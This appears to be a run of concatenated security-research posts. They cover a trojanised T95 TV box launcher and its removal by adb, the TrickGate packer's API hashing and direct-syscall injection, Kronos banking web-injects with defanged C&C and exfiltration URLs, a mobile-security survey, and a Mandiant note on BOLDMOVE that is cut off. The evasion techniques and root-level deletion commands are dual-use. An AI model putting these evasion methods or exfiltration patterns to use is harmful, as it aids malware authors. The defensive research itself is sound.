When I am looking into network traffic, my very first step is installing NoRoot Firewall, as referenced in the Toolset section above. Looking at the logs of NoRoot, it appeared the T95 TV box had quite a bit of traffic coming from DGBLuancher.

NoRoot Firewall

This was of interest considering DGBLuancher, package name com.swe.dgbluancher, does not contain any references to using Internet traffic in the code.

Much of the traffic from DGBLuancher used port 443, which is for HTTPS traffic. Per the Toolset section, I think the best choice of network traffic monitors is Telerik Fiddler Classic. Capturing only an hour of traffic using Fiddler produced a massive list of entries!

The majority of the traffic came from random non-malicious news sites and ad sites. All of this was happening in the background, unseen, until you capture the Internet traffic! To be clear, this is malicious clicker activity, which generates revenue from pay-per-click ads.

But wait, there was more!

There was also a sprinkling of malicious URLs, including but not limited to malicious URLs from the code of Corejava classes.dex.

Tying it all together

Backing up, let’s look at the evidence so far. We have DGBLuancher with no evidence within the code of using Internet traffic capabilities, and we have Corejava classes.dex with lots of evidence within the code of using Internet traffic capabilities. And yet capturing Internet traffic shows a correlation to DGBLuancher, but with URLs from Corejava classes.dex.

My hypothesis was that DGBLuancher was the culprit APK loading and running Corejava classes.dex, but more testing needed to be done.

So, I first uninstalled DGBLuancher, but kept Corejava classes.dex. The result? Malicious Internet traffic stopped. Ergo, Corejava classes.dex cannnot run without DGBLuancher.

Next, I reinstalled DGBLuancher and removed Corejava classes.dex. Again, Malicious Internet traffic stopped. DGBLuancher could not produce malicious Internet traffic on its own. It needed Corejava classes.dex.

The obvious conclusion was that DGBLuancher was indeed the APK loading and running Corejava classes.dex!

If that wasn’t enough evidence, there was even more. If I deleted Corejava classes.dex from the /data/system/Corejava, it magically reappeared. This happened immediately after a reboot or if I simply waited long enough.  But, if I uninstalled DGBLuancher, Corejava classes.dex stops reappearing. With all the evidence, I had DGBLuancher dead to rights. It was the culprit loading and running Corejava classes.dex. 

The malicious behavior of DGBLuancher lands it with the classification of Android/Trojan.Downloader.CoreJava.T95. Despite this detection, Malwarebytes for Android cannot remediate due to DGBLuancher being a system app. For steps to remediate, see the Remediation section below.

The mystery of Corejava

Once I had established that DGBLuancher creates Corejava classes.dex, the next mystery was: What was creating /data/system/Corejava and the rest of its contents? You see, even when DGBLuancher was uninstalled, after removing /data/system/Corejava, it would appear again. Everything except for the Corejava classes.dex file, of course.

Looking at what process was creating /data/system/Corejava, it appeared to be a process called system_server. (Note that depending on where you look, it can also be called system_process.)

By using command logcat | grep system_server in shell, I confirmed that system_server did a lot more than just create /data/system/Corejava. In fact, it seemed to run many of the most important tasks. You can really see how important system_server is by terminating it which results in the device crashing—I do not recommend.

The obvious conclusion was that system_server was a generic system process used by many other elements to run commands in the background. As a matter fact, DGBLuancher uses system_server to create Corejava classes.dex. Anything from a script to another app could be using system_server to create /data/system/Corejava—system_server  is not the culprit itself, just a conduit.

With this information, I did everything from analyzing system level bash scripts on the device, looking for keywords such as Corejava within every file, to uninstalling apps to see if it resolved.

The only thing I neglected doing was uninstalling apps that would compromise the functionality of the device. After all, if the TV box cannot function, what’s the point of remediating? It pains me to say that this one is going to have to remain a mystery for now. This is no matter, since with DGBLuancher uninstalled the malware is neutralized. In addition, Daniel finds a clever way to stop the recreation that we will address below.

Remediation
Factory reset

I strongly recommend restarting the T95 TV box from a fresh factory reset before proceeding to remediation. If you’ve been using the TV box for a while, there’s a good chance other malware could have been downloaded during that time. As a result of resetting to factory, all of this will be removed, but keep in mind this will also erase all non-system related items on the device.

To factory reset the T95:

Go to the Gear icon for the settings screen
Navigate to More Settings
Navigate to Device Preferences
Scroll down to bottom and press Reset

Read the warning, and proceed with Reset if you’re willing to go ahead

After the reset, do not connect the T95 TV box to a network just yet. Don’t do this until you have gone through remediating DGBLuancher in the next section. This will prevent any malware being installed via network download. 

Using adb

The first place you should start is installing adb onto a Windows, Mac, or Linux environment. (Check the Toolset section above on how to install.) Next, you will need to put the T95 TV box into Developer Mode and turn on USB0 device mode.

Setttings

Go to the Gear icon for the settings screen
Navigate to About
Scroll down to Build
Press Build several times until it states You are now a Developer!

Press the Back button to return to settings screen
Navigate to More Settings
Navigate to Device Preferences > Developer options
Scroll down to Debugging section
Ensure these toggle switches are on
USB debugging (should be on by default)
USB0 device mode enable

Now that we have adb installed, and the T95 TV box in Developer Mode the next step is to test adb.

You will need a cable that can join your computer to the T95, which has a USB-A port. (If you can find USB-A to USB-A cable sitting around your place, congratulations, you have the rarest cable known to myself.)

With your comptuer connected to the T95 TV box, open a terminal (this is Command Prompt on Windows) and type:

adb devices

There should be an ID number followed by the word device under List of devices attached, for example:

List of devices attached

12345c3006c0c721d0e     device

Now you are ready to remediate some nasties!

Removing DGBLuancher

Before we remediate DGBLuancher, be aware that DGBLuancher is the T95 TV box’s launcher app. A launcher app is the app used to launch and run everything on an Android device. For example, all your app icons, widgets, clock, getting to Settings, etc. Which leads me to this warning:

Uninstalling DGBLuancher without first installing another launcher to replace it will render the Android device useless.

The good news is that you can still use adb to send commands even without a launcher. So, make sure to set that up first.

You can use whatever TV launcher you decide. There are many good choices on Google Play to choose from.  Personally, I just chose the first one on the list, which happened to be ATV Launcher. As long as it’s malware-free, anything is better than DGBLuancher!

But before we begin, a disclaimer is necessary:

Proceed at your own risk! Neither I, nor Malwarebyes, can guarantee this will not damage your Android device and we accept no responsibility if it does. By proceeding, you take the risk and responsibility upon yourself.

Now usually, I would highly recommend using Google Play to install apps instead of a third-party app store. It gives you have the added protection of Google Play Protect, and it also ensures the app will work with your make, model, and OS version. However, since this was a preinstalled, malware-infested TV box that was already rooted, that was bought for around $30 on Amazon… you may choose to make an expedient exception this one time.

The options are:

Connect the TV box to the Internet to download a TV launcher from Google Play, whilst letting the malware do nasty things in the meantime.
Download a TV launcher from a third-party app store, such as ATV Launcher form APKPure, and then drag-drop it to the Downloads folder on the TV Box. Then install it from the FileManager app already on the TV box. All while not opening up the flood gates to malware-riddled network traffic.

Re-read that disclaimer above and make a decision you’re willing to take full responsibility for, then proceed.

Now that you have another TV launcher installed, you can now remove DGBLuancher using the following adb command:

adb shell pm uninstall -k –user 0 com.swe.dgbluancher

If, for whatever reason, you need to revert to DGBLuancher, here’s the command:

adb shell pm install -r –user 0 /system/priv-app/Launcher10/Launcher10.apk

Note that the above pm uninstall  command uses -k to quote “keep the data and cache directories around after package removal”, and –user 0 to only uninstall for the current user. Therefore, it is a safer method to uninstall system level apps because you can reinstall from the APK stored in the system folder.

At this point, it is a good idea to restart the TV box. With DGBLuancher now uninstalled and a new launcher running, Corejava classes.dex is neutralized. You can now use the box safely. But if you’d rather be safe than sorry, you can move on to removing Corejava for good.

Removing Corejava

A big shout out to Daniel for providing this clever method of removing and stopping Corejava from being created again in his cleanup script!

First, you need to gain root access:

adb root

Now, enter shell:

adb shell

From shell, check to confirm that Corejava exists (the output will tell you):

test -d /data/system/Corejava/ && echo “You are infected with Corejava!!!” && cd /data/system/Corejava/ || echo “Corejava does not exist”

If you get output, “You are infected with Corejava!!!”, then move on to the removal process. That starts with removing /data/system/Corejava/ and anything in it:

rm -rf /data/system/Corejava

Now that it’s gone, we need to stop it from every coming back. Using the command touch, create an empty file named Corejava in /data/system:

touch /data/system/Corejava

Next, change the permissions so nothing can modify it:

chmod 000 /data/system/Corejava

This last step is key. It uses the chattr command located under busybox, which holds common legacy Unix commands, to set the attribute to +i. Why? Because “a file with the ‘i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file’s metadata cannot be modified, and the file cannot be opened in write mode.” In other words, game over Corejava!:

busybox chattr +i /data/system/Corejava

With these settings in place, whenever the system tries to create /data/system/Corejava, it will be denied as seen in the output from logcat | grep Corejava run in shell:

FileUtils: Failed to chmod(/data/system/Corejava): android.system.ErrnoException: chmod failed: EPERM (Operation not permitted)

Adups

Adups and I have had a fiery relationship. We have crossed paths several times. This time though, I come to Adups’ defense. Not all Adups versions are malicious, and I see no malicious activity from the version on the T95 TV box.

Although the existence of it prompted me into wanting to analyze the T95 TV box, it was not the culprit this time. That being said, you can follow the Uninstalling Adups and other preinstalled malware via adb command line tool just to make sure you are free and clear of any future malware. With Adups’ shady past, it probably isn’t a bad idea. Just remember, Adups is the app used to update the system including security patches. Luckily, the tutorial will show you how to restore Adups in case you want or need to run an update.

“Budget” should not mean “malware”

Once again, thank you to Daniel Milisic for bringing this to our attention. I’ll end by saying buying “budget” should not mean “malware infested”, as we’ve seen disgustingly in the past. Especially when the device is bought through a reputable online store like Amazon. I hope this analysis will help others remediate this bad actor. Stay safe out there!

Samples
Malicious classes.dex file

MD5: F9802B1168D5832D32C229776CD9B9AA.

Malicious Launcher APK

Package Name: com.swe.dgbluancherMD5: EB850022E4269BB1DAB9FC5D2B0B734F

Research by: Arie Olshtein

Executive summary

Initially observed in July 2016, TrickGate is a shellcode-based packer offered as a service to hide malware from EDRs and antivirus programs.

Over the last 6 years, TrickGate was used to deploy the top members of the “Most Wanted Malware” list, such as Cerber, Trickbot, Maze, Emotet, REvil, Cobalt Strike, AZORult, Formbook, AgentTesla and more.

TrickGate managed to stay under the radar for years because it is transformative – it undergoes changes periodically. This characteristic caused the research community to identify it by numerous attributes and names.

While the packer’s wrapper changed over time, the main building blocks within TrickGate shellcode are still in use today.

Check Point Threat Emulation successfully detects and blocks the TrickGate packer.

Introduction

Cyber criminals increasingly rely on packers to carry out their malicious activities. The packer, also referred to as “Crypter” and “FUD” on hacking forums, makes it harder for antivirus programs to detect the malicious code. By using a packer, malicious actors can spread their malware more easily with fewer repercussions. One of the main characteristics of a commercial Packer-as-a-Service is that it doesn’t matter what the payload is, which means it can be used to pack many different malicious samples. Another important characteristic of the packer is that it is transformative – the packer’s wrapper is changed on a regular basis which enables it to remain invisible to security products.

TrickGate is a good example of a strong, resilient Packer-as-a-Service, which has managed to stay under the cyber security radar for many years and continually improve itself in different ways. We managed to track TrickGate’s breadcrumb trail despite its propensity for rapidly changing its outer wrapper.

Although a lot of excellent research was conducted on the packer itself, TrickGate is a master of disguises and has been given many names based on its varied attributes. Its names include “TrickGate”, “Emotet’s packer”, “new loader”, “Loncom”, “NSIS-based crypter” and more. We connect the dots from previous researches and with high confidence point to a single operation that seems to be offered as a service.

TrickGate over the years.

We first observed TrickGate at the end of 2016. Back then, it was used to deliver Cerber ransomware. Since that time, we are continually observing TrickGate and found it is used to spread all types of malwares tools, such as ransomware, RATs, info-stealers, bankers, and miners. We noticed that many APT groups and threat actors regularly use TrickGate to wrap their malicious code to prevent detection by security products. TrickGate has been involved in wrapping some of the best-known top-distribution malware families, such as Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more.

Figure 1 – TrickGate over the years.

TrickGate Distribution.

We monitored between 40 to 650 attacks per week during the last 2 years. According to our telemetry, the threat actors who use TrickGate primarily target the manufacturing sector, but also attack education facilities, healthcare, finance and business enterprises. The attacks are distributed all over the world, with an increased concentration in Taiwan and Turkey. The most popular malware family used in the last 2 months is Formbook with 42% of the total tracked distribution.

Figure 2 – TrickGate statistics during Oct-Nov 2022.

Attack flow:

An overview of the attack flow that is commonly found in attacks involving TrickGate:initial access

The initial access made by the packer’s users can vary significantly. We monitor the packed samples spreading mainly via phishing emails with malicious attachments, but also via malicious links.

initial files

The first stage mainly comes in the form of an archived executable, but we monitored many file types and delivery permutations that lead to the same shellcode. We observed the following file types at the first stage:

Archive: 7Z * ACE * ARJ * BZ * BZ2 * CAB * GZ * IMG * ISO * IZH * LHA * LZ * LZH * R00 * RAR * TAR * TGZ * UU * UUE * XZ * Z * ZIP * ZIPX * ZST.

Executable: BAT * CMD * COM * EXE * LNK * PIF * SCR.

Document: DOC * DOCX * PDF * XLL * XLS * XLSX * RTF.

shellcode loader

The second stage is the shellcode loader which is responsible for decrypting and running the shellcode.

We noticed 3 different types of code language used for the shellcode loader. NSIS script, AutoIT script and C all implement similar functionality.

Shellcode

The shellcode is the core of the packer. It’s responsible for decrypting the payload and stealthily injecting it into a new process.

Payload

The payload is the actual malicious code and is responsible for carrying out the intended malicious activity. The payloads differ according to the actor who used the packer.

Figure 3 – Attack flow.

Examples of the different attack flows we observed in the past year:

FEB 24, 2022

Figure 4 – LNK flow

RAR: 3f5758da2f4469810958714faed747b2309142ae

LNK: bba7c7e6b4cb113b8f8652d67ce3592901b18a74

URL: jardinaix[.]fr/w.exe

EXE 63205c7b5c84296478f1ad7d335aa06b8b7da536 

Mar 10, 2022

Figure 5 – PDF flow.

PDF: 08a9cf364796b483327fb76335f166fe4bf7c581

XLSX: 36b7140f0b5673d03c059a35c10e96e0ef3d429a

URL: 192.227.196[.]211/t.wirr/XLD.exe

EXE:  386e4686dd27b82e4cabca7a099fef08b000de81 

Oct 3, 2022

Figure 6 – SFX flow.

7Z: fac7a9d4c7d74eea7ed87d2ac5fedad08cf1d50a

EXE: 3437ea9b7592a4a05077028d54ef8ad194b45d2f 

Nov 15, 2022

Figure 7 – AutoIT flow.

R11: 755ee43ae80421c80abfab5481d44615784e76da

EXE: 666c5b23521c1491adeeee26716a1794b09080ec

Shellcode loader

The Shellcode loader usually contains a single function which is responsible for decrypting and loading the shellcode into memory. These are the basic steps:

Read the encrypted shellcode. The encrypted shellcode can be stored in a file on the disc, in the “.rdata” section or as a resource.

Allocate memory for the shellcode, usually by calling VirtualAlloc.

Decrypt the shellcode.

Trigger the shellcode. As we explain below, this can be done using a direct call or by callback functions.

Figure 8 – Shellcode loader – deobfuscated AutoIT version.

Figure 9 – Shellcode loader C version.

In the more recent versions of TrickGate, the shellcode loader abuses the “Callback Functions” mechanism. The loader utilizes many native API calls which take a memory address as an argument of a callback function. Instead of the Callback Function, the loader passes on the address of the newly allocated memory which holds the shellcode.  When Windows reaches the point of the registered events, the DriverCallback executes the shellcode. This technique breaks the flow of the behavior we’re monitoring by having Windows OS run the shellcode at an unknown time. In the shellcode loader above, you can see two examples of this in the images “EnumTimeFormatsA” and “EnumSystemCodePagesW”. 

Shellcode similarity and TrickGate vacation

Usually, when we find code similarity between unrelated malware families, it is more likely that the actors copied from a mutual resource or shared some pieces of code. For a long time, we noticed a unique injection technique that incorporated the use of direct kernel syscalls, but we didn’t realize the significance, thinking it was probably a fragment of shared code.  What caused us to suspect that this unique injection may be controlled solely by one actor is the fact that we saw an occasional “time-off” in operation, and it is very unlikely that several different groups will take a break at exactly the same time. The last break, which was more than 3 months long (from June 13, 2022 to September 26, 2022) was an opportunity for us to verify our suspicion, and dive into the shellcode.

Figure 10 – TrickGate in the last 2 years.

To verify our suspicion, we started to analyze samples across the timeline.

We started our analysis by comparing a fresh sample to an older one. For this test we used

2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c

compared to

2017-10_CoinMiner: 1a455baf4ce680d74af964ea6f5253bbeeacb3de

We know from the behavioral analysis that a similarity exists in the shellcode, so we ran the samples till the point the shellcode is decrypted in memory and then we dumped the shellcode to the disk. Next, we used the Zynamics BinDiff tool (owned by Google) to check similarities in both shellcodes. The results showed a 50% similarity between the tested shellcodes. Fifty percent over a long period of time – more than five years – for quite a large piece of shellcode (~5kb) is unexpected. This automatically raised suspicions that this might be a maintained shellcode, but we needed further evidence in the form of similarity analysis over shorter periods of times to see if it had changed gradually.

Figure 11 – BinDiff result on shellcode extracted 2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c VS 2017-10_CoinMiner: 1a455baf4ce680d74af964ea6f5253bbeeacb3de.

For further analysis, we took random samples from the past 6 years. For each sample, we dumped the shellcode and checked the similarity of the result over time. As you can see in the following graph, the results point to small changes made over time. On the left side we see samples dating from 2016 till 2020 showing about 90% similarity. On the right side, we see a forked version showing a high similarity within itself, but lower similarity with the original version on the left.

Figure 12 – Bindiff result on extracted shellcodes.

We then dived into the gap between the shellcodes to see the impact caused by:

Different compilers

Obfuscations

Evasion modules

Persistence modules (run the packet payload at the next login)

Function order

Local variables vs structures

After we cleaned the gap noise, we got the core functionality of the packer. The author constantly maintained the shellcode but used “building blocks” as described in the next section.

Figure 13 – Control flow graph – on the main injection function. Diffing 2016-07_ Cerber: 24aa45280c7821e0c9e404f6ce846f1ce00b9823 VS 2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c

Figure 14 – Diffing kernel direct call of NtWriteVirtualMemory 2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c VS 2016-07_ Cerber:  24aa45280c7821e0c9e404f6ce846f1ce00b9823

TrickGate shellcode’s construction elements

As mentioned above, the shellcode has been constantly updated, but the main functionalities exist on all the samples since 2016. An overview of the shellcode’s building-blocks can be described as follows:

API hash resolving.

Load to memory and decrypt the payload.

Injection using direct kernel calls.

Manually map a fresh copy of ntdll.

Dynamically retrieve the kernel syscall numbers.

Invoke the desired syscalls.

Inject and run the payload.

API hash resolving.

When we analyzed the TrickGate code, no constant strings can be found. Many times, TrickGate intentionally adds clean code and debug strings to throw off any analysis. To hide the needed strings and its intentions, TrickGate uses a common technique called API hashing, in which all the needed Windows APIs are hidden with a hash number. Until January 2021, TrickGate used to hash the shellcode string with CRC32. In the newer version, TrickGate started using a custom hash function.

The equivalent Python hashing functions used in the last 2 years:

def hash_str_ror1(str):
h = 8998
for c in str:
h += ord(c) + (((h >> 1) & 0xffffffff) | ((h << 7) & 0xffffffff))
return h & 0xffffffff

def hash_str21(str):
h = 8998
for c in str:
h = ord(c) + (0x21 * h)
return h & 0xffffffff

The following Kernel32 API names have been hashed in TrickGate samples:

API NAMECRC32hash_str_ror1hash_str21CloseHandle0xB09315F40x7fe1f1fb0xd6eb2188CreateFileW0xA1EFE9290x7fe636230x8a111d91CreateProcessW0x5C856C470x7fe2736c0xa2eae210ExitProcess0X251097CC0x7f91a0780x55e38b1fGetCommandLineW0xD9B204940x7fb6c9050x2ffe2c64GetFileSize0xA7FB41650x7fbd727f0x170c1ca1GetModuleFileNameW0XFC6B42F10xff7f721a0xd1775dc4GetThreadContext0x649EB9C10x7fa1f9930xc414ffe3IsWow64Process0x2E50340B0xff06dc870x943cf948ReadFile0x95C03D00x7fe7f8400x433a3842ReadProcessMemory0xF7C7AE420x7fa3ef6e0x9f4b589aSetThreadContext0x5688CBD80xff31bf160x5692c66fVirtualAlloc0x9CE0D4A0x7fb47add0xa5f15738VirtualFree0xCD53F5DD0x7f9517040x50a26afFigure 15 – API hashing.

Load to memory and decrypt the payload.

TrickGate always changes the way the payload is decrypted, so unpacking solutions that we observe now will not work on the next update. Most of the samples use a custom decryption method but on older samples we also saw known cyphers such as RC4 implementation or the use of Windows APIs for encryption.

Injection using direct kernel calls:

After decrypting the payload, the shellcode then injects it into a newly created process. After the process is created using the create_suspended flag, the injection is done by a set of direct calls to the kernel. For every one of these ntdll API calls:  

NtCreateSection

NtMapViewOfSection

NtUnmapViewOfSection

NtWriteVirtualMemory

NtResumeThread

The following actions are executed:

Manually map a fresh copy of ntdll from the disk.

Resolve the address of a given hash in the newly mapped ntdll.

Dynamically extract the requested System Service Number (SSN).

Direct kernel Invoke with the SSN.For Windows 64-bit: Switch to 64-bit mode using “Heaven’s Gate” technique and SYSCALL SSN

For Windows 32-bit: Call SYSENTER SSN

Figure 16 – Function call graph SYSCALL ID from Manually mapped DLL.

The way TrickGate invokes direct-syscalls is intriguing, as it uses a technique similar to Hell’s Gate. Hell’s Gate is a technique presented publicly in 2020 as a way to dynamically retrieve and execute direct syscall numbers. Here you can find samples dating to 2016 which manage to accomplish the equivalent action to retrieve and execute direct system calls without the need to maintain a System Service Descriptor Table (SSDT).

Figure 17 – SSN dynamically extracted 2016-07_Cerber:  24aa45280c7821e0c9e404f6ce846f1ce00b9823

The injection module has been the most consistent part over the years and has been observed in all TrickGate shellcodes since 2016.

Conclusion

We created strings correlating the most wanted malware in the last 6 years to a single Packer-as-a-Service named TrickGate, whose transformative abilities make it hard to identify and track. Understanding the packer’s building blocks is of crucial importance to detect the threat, as blocking the packer will protect against the threat in an early stage, before the payload starts to run.

Packers often get less attention, as researchers tend to focus their attention on the actual malware, leaving the packer stub untouched. However, the identified packer can now be used as a focal point to detect new or unknown malware.

Analyzed samples.

03d9cbee9522c2c8a267b7e9599a9d245c35c7ac

043ae57e01ebd0a96fa30b92821b712504cfde03

1a455baf4ce680d74af964ea6f5253bbeeacb3de

22f26496f2e8829af9f5cfcd79c47e03fe9a21bb

24aa45280c7821e0c9e404f6ce846f1ce00b9823

30e0181a018fa7dcbd2344dc32adcf77cf840ebe

3437ea9b7592a4a05077028d54ef8ad194b45d2f

3817bad277aa50016e08eed35e92d4a3b5247633

4380044a9517a08514459005836c5f92e4a33871

4f6fa448454b581d6c8e7aa6ed3ef72e66062bf8

666c5b23521c1491adeeee26716a1794b09080ec

75d999d431819311abf8bd048cd084acdcd5f4e1

7f456f8b01fc8866aeed4678a14479b6eaa62fed

975629358bfbba0344ef0dae4d22697ceb2a32b4

977800bd7be3c5c9f2c0dac7f4806e586d8f7b1a

9f20d00b4ec898a33e130720d4d29e94070e1575

a1f73365b88872de170e69ed2150c6df7adcdc9c

a661541c4cbeb1db859f6cec6c53979b5633c75e

afbe838c881e5b223351ff8fa05ddeb3678581ba

b2d58dfee71ce9c509fab1f00ce04c9526c60695

e6dccf4b1fc5ab116b6bc1321346b35dbf42f387

fa5c79321dd4cc2fea795d6ebe2e823abe33ca6f

The post Following the Scent of TrickGate: 6-Year-Old Packer Used to Deploy the Most Wanted Malware appeared first on Check Point Research.

Malware-Detected-Warning-Screen.jpeg

The Evolution of Kronos Malware

The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims.

After remaining dormant for a few years, the Kronos banking trojan reemerged in 2018, under the name Osiris, and was used in a banking trojan campaign. While there were some differences between the two strains, both Osiris and Kronos shared the same technique for stealing information.

Kronos made yet another resurgence — this time combined with ransomware — and in late 2022 IBM Security Trusteer saw an increase in Kronos malware activity in Mexico. In these attacks, it was used to launch JavaScript web-injects on financial institutions with a malicious chrome extension.

A Brief Review of the Kronos Malware Attack in Mexico

The first victim of the 2022 Kronos malware had the malware automatically installed through a malicious chrome extension called “Seguridad” (Security).

This is the first time we have observed malware utilizing a chrome extension with web injects on financial institutions.

The Kronos malware utilizes a configuration file to identify targeted pages within a victim’s web browsing session. Once a victim navigates to one of these pages, the malware will initiate a call to an external resource and inject a malicious JavaScript payload. Once the malicious chrome extension is installed, if the user attempts to access one of the targeted Mexican financial institutions, the extension will inject malicious JavaScript with the name: “8vZ9d1-ad.js” or “ok.js”:

This payload can then be used to steal sensitive information from the victim’s device.

Stealthy Web Injection Capabilities

During an investigation of the Kronos malware’s web-injects, it was found that the main goal of the attacker is to steal sensitive information from the victim, such as login credentials (username, password), mobile tokens, OTP tokens, and more. These stolen pieces of information can then be used by the attacker to gain unauthorized access to the victim’s accounts or to commit other fraudulent activities.

Example for Web-Inject:

Once a user is infected with the Kronos malware, the malware may wait for the user to enter their login credentials on a targeted website. At this point, the JavaScript component of the malware will begin to inject itself into the victim’s web browser, displaying a fake loading animation (commonly known as a “loader gif”) in order to obscure the fact that the user’s information is being stolen. This technique is commonly used by malware to avoid detection and increase the likelihood of successfully stealing sensitive information from the victim:

The malware may then prompt the user for additional sensitive information, such as a telephone number, under the guise of verifying the user’s identity. This information is then used by the attacker for various nefarious purposes.

Main JavaScript function:

Ask_user
Send command forgot username

Ask_pass
Enter password

Ask_mobile_access_token
Ask user to enter access mobile token

Ask_mobile_confirmation
Ask mobile token confirmation

Ask_otp_access_token
Ask for OTP for physical token

Ask_calc_access_token
Second confirmation for token

Ask_calc_confirmation_token
Third confirmation for token

Ask_email
Ask for email address

Ask_info
Request for landline and cellphone

Scroll to view full table

Once the malware has fully initialized and its various functions have been enabled, it will use the “send_home” function to exfiltrate any stolen information back to the attacker’s server. This function is typically used to transmit sensitive data that has been collected by the malware during the victim’s web browsing session:

The “send_home” function is used by the Kronos malware to transmit stolen information to the attacker’s command and control (C&C) server. This transmission typically includes a unique token and a link to the financial institution from which the information was stolen. This allows the attacker to easily identify the source of the stolen information and track the progress of the malware’s activities.

Example: hxxps://tomolina.top/uadmin/gate.php?pl=token&link=hsbc_mx1.1

C&C Panel (uadmin)

The “uadmin” panel is a C&C interface used by attackers to manage various aspects of their malware campaigns. It allows the attacker to configure web injects and other options, as well as view sensitive information that has been collected from victims. This information, which may include login credentials, mobile tokens, and OTP codes, is typically used by the attacker for various nefarious purposes.

Inside C&C (uadmin):

The source code for the “uadmin” panel has been leaked in the past, and below is an example of the main admin code:

Main page:

Main Token Page:

This page contains logs of infected victims, including:

The last time the victim connected to the targeted bank.
The victim’s IP address.
Device information (e.g., operating system and web browser type).
The name of the targeted bank that the attacker has configured.
Quick data showing the victim’s login credentials.
The “redirect” feature, which redirects all existing and new bots to present links on each page.
The “block” feature, which blocks access to the page after the user enters their credentials.
Comments from the C&C owner.

The C&C admin page provides a robust view of victim activity and is an efficient way for attackers to collect victim data and user statistics that show the progress of their campaign. The C&C main features include:

Statistics on the number of infected bots and other metrics.
A list of infected bots, including their IP addresses and other details.
The ability to remotely control infected bots.
The ability to export logs of stolen information.
Settings for the stealer component of the malware.
A blacklist of web pages that the malware should not target.

Targeted Financial Institution: Mexico Region

During an observed attack on a Mexico region financial institution, we identified multiple indicators of compromise.

IOC: 

In this instance, we were able to successfully retrieve Indicator of Compromise (IOC) from the JavaScript configuration file located at “8vZ9d1-ad.js”.

hxxps://dlxfreight.bid/mx/
hxxps://dlxfreight.bid/w1Q5DXr7te/gate.php
hxxps://pnlbanorte.dlxfreight.bid
hxxps://dlxfreight.bid/
hxxp://tomolina[.]top/
hxxps://facturacionmexico.net/choa.php
hxxps://dlxfreightmore.com

How to Stay Safe from Kronos

To protect against Kronos, it is important to use reputable antivirus and anti-malware programs, as well as to keep systems updated with the latest security patches and software updates. Additionally, employees should be educated on how to recognize and avoid phishing emails, and organizations should implement email filtering and other security measures to block malicious emails.

If a system is suspected to be infected with Kronos, it is important to take the system offline immediately and perform a thorough scan using antivirus and anti-malware tools. Any sensitive data that may have been compromised should also be changed immediately.

It is suspected that this malware campaign may potentially spread to the North American region and potentially also to the European region. Due to its advanced functionality and ability to evade detection, it is important for individuals and organizations in these regions to be aware of the threat it poses and take the actions noted above to better protect against it.

To learn how to authenticate customers, detect fraud and protect against malicious users across all channels, explore IBM Security Trusteer solutions.

The post Kronos Malware Reemerges with Increased Functionality appeared first on Security Intelligence.

The results of our latest survey on mobile cybersecurity in K-12 and hospitals are in—and it’s not all peaches and roses.

When we talk about endpoint protection, it’s only natural to only think about the most commonly compromised endpoints like work laptops and servers—but your smartphone isn’t off the hook.

There are plenty of risks associated with mobile devices, and we ignore them at our peril. In 2020 alone, almost 50% of organizations had at least one employee download a malicious mobile application that threatened their organization’s network and data.

Certain industries such as education and healthcare face their own distinct set of challenges when it comes to mobile security, namely a diverse amount of endpoints and lackluster budgets and infrastructure.

To better understand the mobile security landscape, we asked 250 schools and hospitals about their mobile security posture (including Chromebooks). The average organization surveyed was based in North America and had anywhere from 250 to over 5000 endpoints.

Here’s some key takeaways.

45% of schools reported that at least one cybersecurity incident last year started with Chromebooks or other mobile devices

Almost 30% of schools and hospitals aren’t protecting mobile devices with their current endpoint protection solution

77% of organizations are confident in their ability to protect mobile devices, including Chromebooks, from cybersecurity threats

Chromebooks and employee devices rank top among schools’ riskiest attack surfaces

63% of organizations say cost is their biggest concern for their current mobile security tools

58% of organizations’ cybersecurity budgets are the same compared to 2022

Mobile security for resource-constrained organizations

Don’t let mobile and Chromebook threats catch you off guard in 2023.

Malwarebytes 2023 State of Mobile Cybersecurity showed that while most organizations may be confident in their mobile security posture, almost a third aren’t currently protecting their mobile endpoints and close to half have experienced a cybersecurity incident due to a mobile device or Chromebook in 2022.

Needless to say, today’s organizations and public sector institutions need to protect a growing number of mobile endpoints, including Chromebooks.

Enter Malwarebytes Mobile Security for Business, which extends our award-winning endpoint protection to mobile devices. Tailor-made for organizations with resource constraints, IT teams can conveniently manage protection across Chrome OS, Android and iOS devices from the same cloud-native console monitoring their servers, workstations, and laptops.

Learn more about mobile security and why it’s important and check out our blog posts “Improving security for mobile devices: CISA issues guides” and “Do Chromebooks need antivirus protection?” for more tips on improving your organizations mobile and Chromebook security posture.

Stay vigilant! 

Related articles

5 must-haves for K-12 cybersecurity
5 Essential security tips for small businesses
Case study: IntraHealth International boosts ransomware immunity
White paper: Malwarebytes best-informed telemetry: Unmatched threat visibility
What is password manager?

Context

On January 19, 2023, Mandiant security researchers published the technical details of malware campaign preparations they’ve reportedly observed since October 2022.

Two key points should be noted regarding Mandiant’s assessment:

Mandiant has not directly observed exploitation of the vulnerability, or deployment of BOLDMOVE in the wild.Mandiant researchers assess with low confidence that the campaign is related to an unspecified Chinese cyber espionage group based on: timing of development, characters in host survey buffers, and the common tactic of exploiting zero-days in network devices.

Technical Details

According to the National Vulnerability Database from NIST, CVE-2022-42475 has a severity score of 9.8 CRITICAL and is “A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.”

According to Mandiant researchers, the campaign delivered a new backdoor malware they named “BOLDMOVE.” Mandiant identified both Linux and Windows variants of BOLDMOVE but has not observed the malware in the wild.

IOCs

Mandiant researchers provided the following indicators of compromise (IOCs):

IndicatorTypeNotes12e28c14bb7f7b9513a02e5857592ad7MD5Basic BOLDMOVE

